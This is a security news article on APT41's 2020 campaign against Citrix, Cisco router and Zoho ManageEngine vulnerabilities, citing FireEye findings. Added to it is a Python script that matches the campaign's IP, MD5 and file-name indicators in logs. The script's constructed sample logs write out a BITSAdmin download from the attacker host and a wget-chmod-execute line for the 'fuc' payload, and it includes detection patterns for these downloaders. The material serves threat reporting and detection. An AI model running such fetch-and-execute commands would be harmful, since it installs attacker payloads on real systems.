APT41 Zeroes in on Numerous Organizations Using Known Exploits Affecting Citrix, Cisco, and Zoho Products

  • The targets included organizations in Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, and more.
  • The attack campaign has targeted multiple industries such as banking, finance, construction, defense, government, healthcare, high technology, higher education, and more.

APT41, a Chinese cyberespionage group, has been observed exploiting multiple vulnerabilities in a variety of enterprise products to launch attacks across the globe. Described as one of the largest attack campaigns seen from the group, it used exploits for vulnerabilities in Citrix NetScaler/ADC, Cisco RV320/RV325 routers, and Zoho ManageEngine Desktop Central. The campaign was observed to be active from January 20 to March 11, 2020.

Which countries were targeted?
According to FireEye, the targets include organizations in Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, UK, and the USA.

The campaign has targeted multiple industries such as banking/finance, construction, defense, government, healthcare, high technology, higher education, legal, and manufacturing. Apart from these, firms in the media, non-profit, oil & gas, petrochemical, pharmaceutical, real estate, telecommunications, transportation, travel, and utilities sectors were also affected.

On the group’s targeting, researchers said, “It’s unclear if APT41 scanned the Internet and attempted exploitation en masse or selected a subset of specific organizations to target, but the victims appear to be more targeted in nature.”

What are the exploited vulnerabilities?

CVE-2019-19781 in Citrix ADC - Starting on January 20, 2020, APT41 used the IP address 66.42.98[.]220 to scan Citrix Application Delivery Controller (ADC) and Citrix Gateway devices vulnerable to CVE-2019-19781.

After a lull in activity, on February 1 APT41 began using CVE-2019-19781 exploit payloads that initiated a download via the File Transfer Protocol (FTP). Activity spiked again on February 24 and 25, in a pattern almost identical to that of February 1.

CVE-2019-1653 and CVE-2019-1652 in Cisco routers - On February 21, 2020, APT41 successfully exploited a Cisco RV320 router at a telecommunications organization and downloaded a 32-bit ELF binary payload compiled for a 64-bit MIPS processor, named ‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc).

Researchers explained, “It is unknown what specific exploit was used, but there is a Metasploit module that combines two CVEs (CVE-2019-1653 and CVE-2019-1652) to enable remote code execution on Cisco RV320 and RV325 small business routers and uses wget to download the specified payload.”

Exploitation of CVE-2020-10189 in Zoho ManageEngine - Beginning on March 8, 2020, APT41 attempted to exploit the Zoho ManageEngine vulnerability at more than a dozen organizations. FireEye observed two separate variations of how the payloads were deployed. In the first variant, CVE-2020-10189 was exploited to directly upload the ‘logger.zip’ file, which in turn downloaded and executed install.bat and storesyncsvc.dll.

In the second variation, APT41 leveraged the Microsoft BITSAdmin command-line tool to download install.bat from the same known IP address, 66.42.98[.]220, on port 12345. In both variations, the ‘install.bat’ file was used to install the Cobalt Strike BEACON loader named storesyncsvc.dll.
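The indicators the article gives for this campaign (the scanning and staging IP, the staging port, the MD5 of ‘fuc’, and the artifact names logger.zip, install.bat and storesyncsvc.dll) can be turned into a simple log check. The following is an added example written for this page, not code from FireEye or the article. It assumes nothing beyond the indicators quoted above; the six log lines it scans are constructed to resemble Sysmon, proxy and router shell records and are not captured telemetry, and since the article does not say where ‘fuc’ was hosted, the host in the wget line is an assumption.

```python
"""Matching this article's APT41 indicators against log lines (added example).

Illustrative code written for this page, not FireEye's or the article's own
tooling. SAMPLE_LOGS is constructed, not real telemetry; the host 'fuc' is
fetched from is assumed (the article only says the binary was downloaded and
that the Metasploit module uses wget).
"""
import re

# Indicators as the article states them; the IP stays defanged so it can be
# pasted straight from threat reporting and refanged at load time.
IOCS = {
    "ip": "66.42.98[.]220",            # Citrix scanning host and install.bat staging host
    "port": 12345,                     # port install.bat was served from (BITSAdmin variant)
    "md5": "155e98e5ca8d662fad7dc84187340cbc",  # 'fuc', MIPS ELF dropped on the Cisco RV320
    "filenames": ["fuc", "logger.zip", "install.bat", "storesyncsvc.dll"],
}


def refang(ioc: str) -> str:
    """Undo common defanging ('[.]', 'hxxp') so an indicator can be matched literally."""
    return (ioc.replace("[.]", ".")
               .replace("hxxps://", "https://")
               .replace("hxxp://", "http://"))


IP = refang(IOCS["ip"])
# Look-arounds keep 66.42.98.220 from matching inside 166.42.98.220 or 66.42.98.2201.
IP_RE = re.compile(r"(?<![\d.])" + re.escape(IP) + r"(?!\d)")
IP_PORT_RE = re.compile(r"(?<![\d.])" + re.escape(IP) + ":" + str(IOCS["port"]) + r"(?!\d)")
FILENAME_RE = re.compile(
    r"(?<![\w.-])(" + "|".join(re.escape(f) for f in IOCS["filenames"]) + r")(?![\w.-])",
    re.IGNORECASE,
)
# BITSAdmin driven as a downloader: the 'bitsadmin /transfer' form the article describes.
BITSADMIN_RE = re.compile(r"\bbitsadmin(?:\.exe)?\b.*?\s/transfer\b", re.IGNORECASE)
WGET_RE = re.compile(r"\bwget\b", re.IGNORECASE)
MD5_RE = re.compile(r"(?<![0-9a-fA-F])[0-9a-fA-F]{32}(?![0-9a-fA-F])")


def check_line(line: str) -> list:
    """Return the indicator hits for one log line; an empty list means clean."""
    hits = []
    if IP_PORT_RE.search(line):
        hits.append(f"contact with {IP}:{IOCS['port']} (install.bat staging port)")
    elif IP_RE.search(line):
        hits.append(f"contact with {IP} (known APT41 infrastructure)")
    if BITSADMIN_RE.search(line):
        hits.append("bitsadmin /transfer used as a downloader")
    if WGET_RE.search(line) and IP_RE.search(line):
        hits.append("wget fetch from APT41 infrastructure (Cisco RV320 pattern)")
    if any(tok.lower() == IOCS["md5"] for tok in MD5_RE.findall(line)):
        hits.append("hash of the 'fuc' MIPS payload")
    for name in sorted({n.lower() for n in FILENAME_RE.findall(line)}):
        hits.append(f"artifact name {name}")
    return hits


def scan(lines) -> list:
    """Run check_line over every line; return (index, hits) for lines that hit."""
    results = []
    for i, line in enumerate(lines):
        hits = check_line(line)
        if hits:
            results.append((i, hits))
    return results


# Constructed sample records (not captured data).
SAMPLE_LOGS = [
    # Sysmon-style process creation: the BITSAdmin variant of the Zoho intrusion
    'EventID=1 Image=C:\\Windows\\System32\\bitsadmin.exe CommandLine="bitsadmin /transfer bbbb '
    'http://66.42.98.220:12345/test.txt C:\\Users\\Public\\install.bat"',
    # Proxy record: outbound fetch of logger.zip from the staging host
    'proxy src=10.0.0.15 dst=66.42.98.220:12345 method=GET uri=/logger.zip',
    # Router shell record: wget of the MIPS payload (host assumed, see docstring)
    'sh -c "cd /tmp; wget http://66.42.98.220/fuc; chmod +x fuc; ./fuc"',
    # File-create record carrying the reported MD5 in upper case
    'EventID=11 TargetFilename=/tmp/fuc Hashes=MD5=155E98E5CA8D662FAD7DC84187340CBC',
    # Benign lines: 'fuchsia' must not match 'fuc', 166.42.98.220 must not match the IP
    'EventID=1 Image=C:\\Windows\\System32\\notepad.exe CommandLine="notepad.exe fuchsia.txt"',
    'proxy src=10.0.0.20 dst=166.42.98.220:443 method=GET uri=/',
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_LOGS):
        print(f"line {index}: " + "; ".join(hits))
```

Two design points worth keeping when adapting this to a real SIEM query: indicators are stored defanged and refanged at load time, so they can be copied from reporting without hand-editing, and the IP and filename patterns use look-arounds so that a longer address such as 166.42.98.220 or a word such as “fuchsia” does not produce a false positive on substring matching.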

Conclusion
In 2020, APT41 continues to be one of the most prolific threats that security researchers track. This new activity shows how resourceful the group is and how quickly it can leverage newly disclosed vulnerabilities to its advantage.